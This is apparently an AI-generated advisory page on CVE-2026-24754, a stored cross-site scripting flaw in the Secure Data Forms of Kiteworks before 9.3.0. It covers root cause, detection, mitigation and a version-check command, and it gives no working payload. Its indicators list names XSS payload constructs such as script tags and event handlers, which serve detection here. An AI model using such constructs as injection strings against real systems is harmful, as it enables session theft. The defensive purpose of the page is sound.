CVE-2026-24754 Overview
CVE-2026-24754 is a stored cross-site scripting (XSS) vulnerability [CWE-79] affecting Kiteworks, a private data network (PDN) used for secure file sharing and collaboration. The flaw resides in the Secure Data Forms component and impacts all versions prior to 9.3.0. An authenticated attacker can inject persistent JavaScript that executes in the browser sessions of other Kiteworks users. Successful exploitation enables session manipulation, credential theft, and unauthorized actions performed in the victim's context. Kiteworks addressed the issue in version 9.3.0.
Critical Impact
An authenticated attacker can store malicious JavaScript in Secure Data Forms and execute it across other users' sessions, enabling session abuse and data exposure within the Kiteworks PDN.
Affected Products
- Accellion Kiteworks versions prior to 9.3.0
- Kiteworks Secure Data Forms component
- All Kiteworks deployments exposing the vulnerable forms feature to authenticated users
Discovery Timeline
- 2026-06-01 - CVE-2026-24754 published to the National Vulnerability Database (NVD)
- 2026-06-03 - Last updated in NVD database
Technical Details for CVE-2026-24754
Vulnerability Analysis
The vulnerability is a stored XSS flaw in the Kiteworks Secure Data Forms feature. User-supplied input submitted to the forms component is persisted server-side without sufficient output encoding or input sanitization. When other users render views that include the stored data, the browser interprets the attacker-controlled payload as executable JavaScript.
Because the payload is stored and rendered in authenticated user sessions, the attacker does not need to deliver a crafted link. Any user who views the affected form content triggers execution. The Common Weakness Enumeration classification is [CWE-79], Improper Neutralization of Input During Web Page Generation.
Exploitation requires the attacker to hold a valid authenticated account on the Kiteworks instance and the ability to submit data into a Secure Data Form. Victim interaction is required to render the malicious content, but this occurs as part of normal workflow within the application.
Root Cause
The root cause is missing or insufficient sanitization and contextual output encoding of form field content before rendering it back to other users. The application trusts stored form data and emits it into HTML contexts where JavaScript executes.
Attack Vector
The attack vector is network-based and proceeds through the normal Kiteworks web interface. An authenticated user submits a form containing a JavaScript payload. The payload is stored, then executed in the browsers of subsequent users who load the affected form view, running with their privileges and session cookies.
The vulnerability manifests in the Secure Data Forms rendering path. No verified public proof-of-concept is available. See the Kiteworks GitHub Security Advisory GHSA-gxvv-hwgc-w7gh for vendor technical details.
Detection Methods for CVE-2026-24754
Indicators of Compromise
- Stored form field values containing HTML or JavaScript constructs such as <script>, onerror=, onload=, or javascript: URIs
- Outbound HTTP requests from user browsers to unexpected external domains immediately after viewing a Secure Data Form
- Unexpected session token usage or API calls originating from authenticated user sessions shortly after form rendering
Detection Strategies
- Inspect Kiteworks application logs for form submissions that include HTML tags or script syntax in user-supplied fields
- Review web proxy and DNS logs for anomalous beaconing from user workstations correlated with Kiteworks form access
- Audit Secure Data Forms data at rest for payloads containing event handlers, encoded scripts, or obfuscated JavaScript
Monitoring Recommendations
- Enable verbose access logging on Kiteworks and forward to a centralized analytics platform for query and retention
- Alert on Kiteworks user accounts that submit form content matching XSS payload signatures
- Monitor for privilege-sensitive actions performed immediately after a user opens a form, which may indicate hijacked session activity
How to Mitigate CVE-2026-24754
Immediate Actions Required
- Upgrade all Kiteworks instances to version 9.3.0 or later as the primary remediation
- Inventory existing Secure Data Forms submissions and remove any entries containing script content or HTML event handlers
- Rotate session tokens and force re-authentication for users who may have rendered untrusted form content
Patch Information
Kiteworks released a fix in version 9.3.0. Administrators should apply the upgrade following the vendor's documented procedure. Refer to the Kiteworks Security Advisory GHSA-gxvv-hwgc-w7gh for release notes and upgrade guidance.
Workarounds
- Restrict Secure Data Forms creation and submission to a minimal set of trusted users until the patch is applied
- Apply a strict Content Security Policy (CSP) at the reverse proxy layer to limit inline script execution where feasible
- Increase audit and review cadence for all form submissions during the interim window before upgrade
# Configuration example: verify Kiteworks version is 9.3.0 or later
curl -sk https://<kiteworks-host>/api/version | grep -E '"version"\s*:\s*"9\.(3|[4-9])'
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
